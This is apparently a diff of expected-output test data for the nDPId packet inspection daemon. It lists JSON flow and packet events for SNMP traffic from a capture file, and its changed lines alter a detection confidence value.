00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597326858140,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326858140,"pkt":"AAAAmdpxAAwpCIFqCABFAABHgiVAAEAR9t6w0zwrYQBzo5FoAKEAMzUeMCkCAQAEBnB1YmxpY6AcAgQJUAlaAgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326863415,"flow_last_seen":1597326863415,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326863415,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597326863415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326863415,"pkt":"AAAAl9K2AAwpQXJyCABFAABHlH1AAEARqmVBAqLBgkaVueRBAKEAM6R0MCkCAQEEBnB1YmxpY6EcAgQesaH7AgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326863415,"flow_last_seen":1597326863415,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326863415,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326863415,"flow_last_seen":1597326863415,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326863415,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597326863591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1597326863591,"pkt":"AAwpQXJyAAAAl9K2CABFAABTAAgAAP8Rv86CRpW5QQKiwQCh5EEAPzhuMDUCAQEEBnB1YmxpY6IoAgQesaH7AgEAAgEAMBowGAYIKwYBAgEBBQAEDFIxLmxhYi5sb2NhbA=="} 
-00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326863415,"flow_last_seen":1597326863591,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326863591,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326863415,"flow_last_seen":1597326863591,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326863591,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597326863597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326863597,"pkt":"AAAAl9K2AAwpQXJyCABFAABHlIBAAEARqmJBAqLBgkaVueRBAKEAM6N1MCkCAQEEBnB1YmxpY6AcAgQesaH8AgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326976979,"flow_last_seen":1597326976979,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326976979,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1597326976979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597326976979,"pkt":"AAAAuxzeAAwpBeNBCABFAABcyKtAAEARWi0eNo7w+jpwV9u7AKEASImwMD4CAQMwEQIEbJr1bgIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBHUFWIgCAQACAQAwAA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326976979,"flow_last_seen":1597326976979,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326976979,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326976979,"flow_last_seen":1597326976979,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326976979,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1597326977116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597326977116,"pkt":"AAwpBeNBAAAAuxzeCABFAACFAAoAAP8Ro6X6OnBXHjaO8ACh27sAcS3eMGcCAQMwEAIEbJr1bgICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgLNBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBHUFWIgCAQACAQAwETAPBgorBgEGAw8BAQQAQQEB"} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1597326977118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1597326977118,"pkt":"AAAAuxzeAAwpBeNBCABFAACPyNFAAEARWdQeNo7w+jpwV9u7AKEAe86sMHECAQMwEQIEbJr1bQIDAP\/jBAEEAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgICzQQMTk9BVVRITk9QUklWBAAEADAuBAyAAAAJAwCqu8wAAQAEAKEcAgR1BViHAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326981183,"flow_last_seen":1597326981183,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326981183,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1597326981183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597326981183,"pkt":"AAAAuxzeAAwpBeNBCABFAABcyU5AAEARWYoeNo7w+jpwV8zTAKEASN4QMD4CAQMwEQIEW6KoJAIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBAxVvh4CAQACAQAwAA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326981183,"flow_last_seen":1597326981183,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326981183,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326981183,"flow_last_seen":1597326981183,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326981183,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1597326981296,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597326981296,"pkt":"AAwpBeNBAAAAuxzeCABFAACFAA0AAP8Ro6L6OnBXHjaO8AChzNMAcYE6MGcCAQMwEAIEW6KoJAICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgLRBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBAxVvh4CAQACAQAwETAPBgorBgEGAw8BAQQAQQEC"} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1597326981298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1597326981298,"pkt":"AAAAuxzeAAwpBeNBCABFAACPyaxAAEARWPkeNo7w+jpwV8zTAKEAezX3MHECAQMwEQIEW6KoIwIDAP\/jBAEEAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgIC0QQMTk9BVVRITk9QUklWBAAEADAuBAyAAAAJAwCqu8wAAQAEAKEcAgQMVb4dAgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":28,"total-skipped-flows":0,"total-l4-payload-len":2120,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":4,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1597327640387} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327640387,"flow_last_seen":1597327640387,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327640387,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1597327640387,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327640387,"pkt":"AAAA82AcAAwpEAFdCABFAABcnENAAEAR56EjX57ZHk\/WJOwYAKEASB50MD4CAQMwEQIEPsyxCwIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBGdAU6sCAQACAQAwAA=="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327640387,"flow_last_seen":1597327640387,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327640387,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327640387,"flow_last_seen":1597327640387,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327640387,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1597327640485,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327640485,"pkt":"AAwpEAFdAAAA82AcCABFAACFAC4AAP8RBI4eT9YkI1+e2QCh7BgAcbQKMGcCAQMwEAIEPsyxCwICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgVkBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBGdAU6sCAQACAQAwETAPBgorBgEGAw8BAQQAQQEN"} 
00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1597327640489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1597327640489,"pkt":"AAAA82AcAAwpEAFdCABFAACZnE9AAEAR51gjX57ZHk\/WJOwYAKEAhSYyMHsCAQMwEQIEPsyxCgIDAP\/jBAEFAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIFZAQKU0hBMU5PUFJJVgQM+aZLjyUgeKDqkPwVBAAwLgQMgAAACQMAqrvMAAEABAChHAIEZ0BTqgIBAAIBADAOMAwGCCsGAQIBAQUABQA="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327646611,"flow_last_seen":1597327646611,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327646611,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1597327646611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327646611,"pkt":"AAAA82AcAAwpEAFdCABFAABcoAFAAEAR4+MjX57ZHk\/WJMCaAKEASMHoMD4CAQMwEQIEaTnV4AIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBH1wgzUCAQACAQAwAA=="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327646611,"flow_last_seen":1597327646611,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327646611,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327646611,"flow_last_seen":1597327646611,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327646611,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1597327646725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327646725,"pkt":"AAwpEAFdAAAA82AcCABFAACFADEAAP8RBIseT9YkI1+e2QChwJoAcVZ4MGcCAQMwEAIEaTnV4AICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgVrBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBH1wgzUCAQACAQAwETAPBgorBgEGAw8BAQQAQQEO"} 
00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1597327646730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1597327646730,"pkt":"AAAA82AcAAwpEAFdCABFAACZoDlAAEAR424jX57ZHk\/WJMCaAKEAhS98MHsCAQMwEQIEaTnV3wIDAP\/jBAEFAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIFawQKU0hBMU5PUFJJVgQMdsqnL4gHLPYGipA6BAAwLgQMgAAACQMAqrvMAAEABAChHAIEfXCDNAIBAAIBADAOMAwGCCsGAQIBAQQABQA="} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326838035,"flow_last_seen":1597326838291,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326815572,"flow_last_seen":1597326815833,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326976979,"flow_last_seen":1597326977413,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326863415,"flow_last_seen":1597326863776,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326858008,"flow_last_seen":1597326858289,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326981183,"flow_last_seen":1597326981598,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":661,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326838035,"flow_last_seen":1597326838291,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326815572,"flow_last_seen":1597326815833,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 